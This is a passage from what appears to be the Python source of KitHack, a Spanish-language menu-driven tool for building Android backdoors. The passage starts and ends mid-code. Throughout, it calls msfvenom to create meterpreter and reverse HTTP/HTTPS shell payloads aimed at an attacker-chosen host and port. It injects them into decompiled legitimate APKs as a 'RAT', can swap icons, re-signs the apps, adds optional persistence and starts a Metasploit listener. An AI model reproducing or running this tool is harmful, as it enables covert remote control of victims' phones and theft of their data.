continuar..." + .format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n". + format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif m == "02": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) + Tk().withdraw() + APK = filedialog.askopenfilename( + title="KITHACK - SELECT APK ORIGINAL", + filetypes=(("apk files", "*.apk"), ("all files", + "*.*")), + ) + print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}" + .format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating payload...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p android/meterpreter/reverse_tcp LPORT={0} LHOST={1} R > output/payload.apk" + .format(LPORT, LHOST)) + location = os.getcwd() + print("{0}[*] Decompiling original APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk" + .format(APK, location)) + print("\n{0}[*] Decompiling payload APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apktool d -f -o output/payload output/payload.apk" + ) + print("\n{0}[*] Configuring RAT Payload...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + subprocess.Popen(["bash", "-c", ". lib/apkf.sh; rat"]) + print("\n{0}[*] Compiling RAT APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apktool b output/original -o output/kithack.apk") + if os.path.isfile("output/kithack.apk"): + print("\n{0}[*] Signing APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" + ) + time.sleep(4) + os.system( + "zipalign 4 output/kithack.apk output/{0}.apk". + format(mainout)) + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + ".apk" + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) + break + print("\n{0}[*] Deleting temporary files...{1}". + format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" + ) + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause( + "\n{}Presione cualquier tecla para continuar..." + .format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n". + format(RED)) + time.sleep(3) + os.system( + "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" + ) + pause( + "{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + else: + print("{}\n[X] OPCION INVALIDA\n".format(RED)) + time.sleep(3) + pause("{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("clear") + main() + + else: + print("\n{}[X] OPCION INVALIDA\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("clear") + main() + + elif pay == "05": + print("{0}\n [*] {1}Select APK Type:\n".format(DEFAULT, GREEN)) + print("{0}[01]{1} APK MSF".format(WHITE, YELLOW)) + print("{0}[02]{1} APK ORIGINAL".format(WHITE, YELLOW)) + + a = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + a = a.zfill(2) + + if a == "01": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) + while (input( + "\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + break + else: + Tk().withdraw() + icon = filedialog.askopenfilename( + title="KITHACK - SELECT ICON PNG", + filetypes=(("png files", "*.png"), ("all files", + "*.*")), + ) + print("\n{0}ICON: {1}".format(YELLOW, icon)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}" + .format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + file = open("/tmp/data.txt", "w") + file.write(icon + "\n") + file.write(mainout) + file.close() + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p android/shell/reverse_http LHOST={0} LPORT={1} R > output/payload.apk" + .format(LHOST, LPORT)) + print("{0}[*] Decompiling APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apktool d -f -o output/payload output/payload.apk" + ) + print("\n{0}[*] Configuring icon change...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + subprocess.Popen(["bash", "-c", ". lib/apkf.sh; icon"]) + print("\n{0}[*] Compiling RAT APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apktool b output/payload -o output/kithack.apk") + location = os.getcwd() + if os.path.isfile("output/kithack.apk"): + print("\n{0}[*] Signing APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" + ) + time.sleep(4) + os.system( + "zipalign 4 output/kithack.apk output/{0}.apk". + format(mainout)) + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + ".apk" + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) + break + print("\n{0}[*] Deleting temporary files...{1}". + format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "rm -rf output/payload output/payload.apk output/kithack.apk" + ) + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_http; exploit\'"' + .format(LHOST, LPORT)) + pause( + "\n{}Presione cualquier tecla para continuar..." + .format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n". + format(RED)) + time.sleep(3) + os.system( + "rm -rf output/payload output/payload.apk output/kithack.apk" + ) + pause( + "{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + # Salida de bucle + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}" + .format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p android/shell/reverse_http LHOST={0} LPORT={1} R > output/{2}.apk" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.apk".format(mainout)).st_size != 0: + while var.upper() != "N": + print("\n{0}[*] Generating persistence file...{1}". + format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + ".apk" + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) + break + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_http; exploit\'"' + .format(LHOST, LPORT)) + pause( + "\n{}Presione cualquier tecla para continuar..." + .format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format( + RED)) + time.sleep(3) + pause("{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif a == "02": + print("{0}\n [*] {1}Select Method:\n".format( + DEFAULT, GREEN)) + print("{0}[01]{1} Use the old Metasploit method".format( + WHITE, YELLOW)) + print("{0}[02]{1} Use the new KitHack method".format( + WHITE, YELLOW)) + + m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + m = m.zfill(2) + + if m == "01": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) + Tk().withdraw() + APK = filedialog.askopenfilename( + title="KITHACK - SELECT APK ORIGINAL", + filetypes=(("apk files", "*.apk"), ("all files", + "*.*")), + ) + print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}" + .format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -x {0} -p android/shell/reverse_http LHOST={1} LPORT={2} > output/{3}.apk" + .format(APK, LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat( + "output/{}.apk".format(mainout)).st_size != 0: + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + ".apk" + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) + break + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_http; exploit\'"' + .format(LHOST, LPORT)) + pause( + "\n{}Presione cualquier tecla para continuar..." + .format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n". + format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif m == "02": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) + Tk().withdraw() + APK = filedialog.askopenfilename( + title="KITHACK - SELECT APK ORIGINAL", + filetypes=(("apk files", "*.apk"), ("all files", + "*.*")), + ) + print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}" + .format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating payload...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p android/shell/reverse_http LPORT={0} LHOST={1} R > output/payload.apk" + .format(LPORT, LHOST)) + location = os.getcwd() + print("{0}[*] Decompiling original APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk" + .format(APK, location)) + print("\n{0}[*] Decompiling payload APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apktool d -f -o output/payload output/payload.apk" + ) + print("\n{0}[*] Configuring RAT Payload...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + subprocess.Popen(["bash", "-c", ". lib/apkf.sh; rat"]) + print("\n{0}[*] Compiling RAT APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apktool b output/original -o output/kithack.apk") + if os.path.isfile("output/kithack.apk"): + print("\n{0}[*] Signing APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" + ) + time.sleep(4) + os.system( + "zipalign 4 output/kithack.apk output/{0}.apk". + format(mainout)) + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + ".apk" + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) + break + print("\n{0}[*] Deleting temporary files...{1}". + format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" + ) + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_http; exploit\'"' + .format(LHOST, LPORT)) + pause( + "\n{}Presione cualquier tecla para continuar..." + .format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n". + format(RED)) + time.sleep(3) + os.system( + "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" + ) + pause( + "{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + else: + print("{}\n[X] OPCION INVALIDA\n".format(RED)) + time.sleep(3) + pause("{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("clear") + main() + + else: + print("\n{}[X] OPCION INVALIDA\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("clear") + main() + + elif pay == "06": + print("{0}\n [*] {1}Select APK Type:\n".format(DEFAULT, GREEN)) + print("{0}[01]{1} APK MSF".format(WHITE, YELLOW)) + print("{0}[02]{1} APK ORIGINAL".format(WHITE, YELLOW)) + + a = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + a = a.zfill(2) + + if a == "01": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) + while (input( + "\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + break + else: + Tk().withdraw() + icon = filedialog.askopenfilename( + title="KITHACK - SELECT ICON PNG", + filetypes=(("png files", "*.png"), ("all files", + "*.*")), + ) + print("\n{0}ICON: {1}".format(YELLOW, icon)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}" + .format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + file = open("/tmp/data.txt", "w") + file.write(icon + "\n") + file.write(mainout) + file.close() + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p android/shell/reverse_https LHOST={0} LPORT={1} R > output/payload.apk" + .format(LHOST, LPORT)) + print("{0}[*] Decompiling APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apktool d -f -o output/payload output/payload.apk" + ) + print("\n{0}[*] Configuring icon change...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + subprocess.Popen(["bash", "-c", ". lib/apkf.sh; icon"]) + print("\n{0}[*] Compiling RAT APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apktool b output/payload -o output/kithack.apk") + location = os.getcwd() + if os.path.isfile("output/kithack.apk"): + print("\n{0}[*] Signing APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" + ) + time.sleep(4) + os.system( + "zipalign 4 output/kithack.apk output/{0}.apk". + format(mainout)) + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + ".apk" + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) + break + print("\n{0}[*] Deleting temporary files...{1}". + format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "rm -rf output/payload output/payload.apk output/kithack.apk" + ) + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_https; exploit\'"' + .format(LHOST, LPORT)) + pause( + "\n{}Presione cualquier tecla para continuar..." + .format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n". + format(RED)) + time.sleep(3) + os.system( + "rm -rf output/payload output/payload.apk output/kithack.apk" + ) + pause( + "{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + # Salida de bucle + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}" + .format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p android/shell/reverse_https LHOST={0} LPORT={1} R > output/{2}.apk" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.apk".format(mainout)).st_size != 0: + while var.upper() != "N": + print("\n{0}[*] Generating persistence file...{1}". + format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + ".apk" + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) + break + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_https; exploit\'"' + .format(LHOST, LPORT)) + pause( + "\n{}Presione cualquier tecla para continuar..." + .format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format( + RED)) + time.sleep(3) + pause("{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif a == "02": + print("{0}\n [*] {1}Select Method:\n".format( + DEFAULT, GREEN)) + print("{0}[01]{1} Use the old Metasploit method".format( + WHITE, YELLOW)) + print("{0}[02]{1} Use the new KitHack method".format( + WHITE, YELLOW)) + + m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + m = m.zfill(2) + + if m == "01": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) + Tk().withdraw() + APK = filedialog.askopenfilename( + title="KITHACK - SELECT APK ORIGINAL", + filetypes=(("apk files", "*.apk"), ("all files", + "*.*")), + ) + print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}" + .format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -x {0} -p android/shell/reverse_https LHOST={1} LPORT={2} > output/{3}.apk" + .format(APK, LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat( + "output/{}.apk".format(mainout)).st_size != 0: + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + ".apk" + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) + break + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_https; exploit\'"' + .format(LHOST, LPORT)) + pause( + "\n{}Presione cualquier tecla para continuar..." + .format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n". + format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif m == "02": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) + Tk().withdraw() + APK = filedialog.askopenfilename( + title="KITHACK - SELECT APK ORIGINAL", + filetypes=(("apk files", "*.apk"), ("all files", + "*.*")), + ) + print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}" + .format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating payload...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p android/shell/reverse_https LPORT={0} LHOST={1} R > output/payload.apk" + .format(LPORT, LHOST)) + location = os.getcwd() + print("{0}[*] Decompiling original APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk" + .format(APK, location)) + print("\n{0}[*] Decompiling payload APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apktool d -f -o output/payload output/payload.apk" + ) + print("\n{0}[*] Configuring RAT Payload...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + subprocess.Popen(["bash", "-c", ". lib/apkf.sh; rat"]) + print("\n{0}[*] Compiling RAT APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apktool b output/original -o output/kithack.apk") + if os.path.isfile("output/kithack.apk"): + print("\n{0}[*] Signing APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" + ) + time.sleep(4) + os.system( + "zipalign 4 output/kithack.apk output/{0}.apk". + format(mainout)) + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + ".apk" + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) + break + print("\n{0}[*] Deleting temporary files...{1}". + format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" + ) + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_https; exploit\'"' + .format(LHOST, LPORT)) + pause( + "\n{}Presione cualquier tecla para continuar..." + .format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n". + format(RED)) + time.sleep(3) + os.system( + "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" + ) + pause( + "{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + else: + print("{}\n[X] OPCION INVALIDA\n".format(RED)) + time.sleep(3) + pause("{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("clear") + main() + + else: + print("\n{}[X] OPCION INVALIDA\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("clear") + main() + + elif pay == "07": + print("{0}\n [*] {1}Select APK Type:\n".format(DEFAULT, GREEN)) + print("{0}[01]{1} APK MSF".format(WHITE, YELLOW)) + print("{0}[02]{1} APK ORIGINAL".format(WHITE, YELLOW)) + + a = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + a = a.zfill(2) + + if a == "01": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) + while (input( + "\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + break + else: + Tk().withdraw() + icon = filedialog.askopenfilename( + title="KITHACK - SELECT ICON PNG", + filetypes=(("png files", "*.png"), ("all files", + "*.*")), + ) + print("\n{0}ICON: {1}".format(YELLOW, icon)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}" + .format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + file = open("/tmp/data.txt", "w") + file.write(icon + "\n") + file.write(mainout) + 